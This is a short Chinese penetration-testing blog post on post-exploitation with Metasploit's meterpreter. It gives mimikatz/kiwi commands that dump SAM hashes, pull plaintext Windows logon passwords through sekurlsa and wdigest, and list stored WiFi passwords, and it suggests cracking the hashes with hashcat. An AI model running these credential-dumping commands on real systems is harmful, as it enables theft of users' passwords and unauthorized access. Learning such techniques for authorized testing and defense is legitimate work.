渗透测试之提权篇

Author：逍遥子
发布时间：May 5, 2020
5242 views
No comments
1003 words
Categories：全部

利用msf获得系统shell后，就完了？ no~ 我们的渗透之路才刚刚开始。系统提权，权限维持，这些都是最基本的操作，除了这些还有那些好玩的呢？
msf渗透测试

获取明文密码

如下，我们在msf中获得shell后，载入mimikatz模块load mimikatz

这里提示，需要载入kiwi我们再次载入
load kiwi
获取系统hash值

mimikatz_command -f samdump::hashes

参数说明：
user:用户名
NTLM:hash值（如果获取明文失败，我们可以直接利用hashcat暴力破解）
获取密码明文

mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest

获取目标WiFi密码

wifi_list_shared

wifipass

获取扫雷的位置

mimikatz_command -f winmine::infos

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/1971.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

Kali笔记一键关注

Last modification：May 5, 2020

正在沿街乞讨中……

渗透测试之提权篇

逍遥子 • 2020 年 05 月 05 日

<p>利用msf获得系统shell后，就完了？ no~ 我们的渗透之路才刚刚开始。系统提权，权限维持，这些都是最基本的操作，除了这些还有那些好玩的呢？<br><img src="https://blog.bbskali.cn/usr/uploads/2020/05/4276225268.jpg" alt="msf渗透测试" title="msf渗透测试" style=""></p><h3>获取明文密码</h3><p>如下，我们在msf中获得shell后，载入mimikatz模块<code>load mimikatz</code><br><img src="https://niu.bbskali.cn/8d902f9b808f7797d29fc64bc47ee5a6-blogsy" alt="load mimikatz" title="load mimikatz" style=""><br>这里提示，需要载入<code>kiwi</code>我们再次载入<br><img src="https://niu.bbskali.cn/dda814dd27b273685ba2cbf9d0092de8-blogsy" alt="load kiwi" title="load kiwi" style=""><br>获取系统hash值</p><pre><code>mimikatz_command -f samdump::hashes</code></pre><p><img src="https://niu.bbskali.cn/f0bb20c58c25dca7288b4fa087bb6ee8-blogsy" alt="" title="" style=""><br><strong>参数说明：</strong><br><code>user:</code>用户名<br><code>NTLM:</code>hash值（如果获取明文失败，我们可以直接利用hashcat暴力破解）<br>获取密码明文</p><pre><code>mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest</code></pre><p><img src="https://niu.bbskali.cn/fcb861e30263a8dae8e13c1015581d21-blogsy" alt="" title="" style=""></p><h3>获取目标WiFi密码</h3><pre><code>wifi_list_shared</code></pre><p><img src="https://niu.bbskali.cn/66e5d0313e513734de2f1190ebfe579d-blogsy" alt="wifipass" title="wifipass" style=""></p><h3>获取扫雷的位置</h3><p><code>mimikatz_command -f winmine::infos</code></p><hr class="content-copyright" style="margin-top:50px" /><div class="post-copyright" style="font-style:normal"> <p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：<a class="content-copyright" href="https://blog.bbskali.cn/1971.html">https://blog.bbskali.cn/1971.html</a></p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>

渗透测试之提权篇

获取明文密码

获取目标WiFi密码

获取扫雷的位置

Leave a Comment Cancel reply
请输入正确的邮箱，以便收到回复!

badusb攻击windows10（msfconsole版）

kali下androidshell那些事

kali linux WiFi钓鱼

浅谈Fluxion最新版无线钓鱼遇到的问题

typecho将Gravatar头像改为QQ头像

Adobe 全家桶破解版使用方案

此内容被密码保护

此内容被密码保护

Xshell7 Xftp7 去掉免费许可证弹窗

kali安装Nessus

渗透测试之提权篇

获取明文密码

获取目标WiFi密码

获取扫雷的位置

Leave a Comment Cancel reply 请输入正确的邮箱，以便收到回复!

渗透测试之提权篇

Leave a Comment Cancel reply
请输入正确的邮箱，以便收到回复!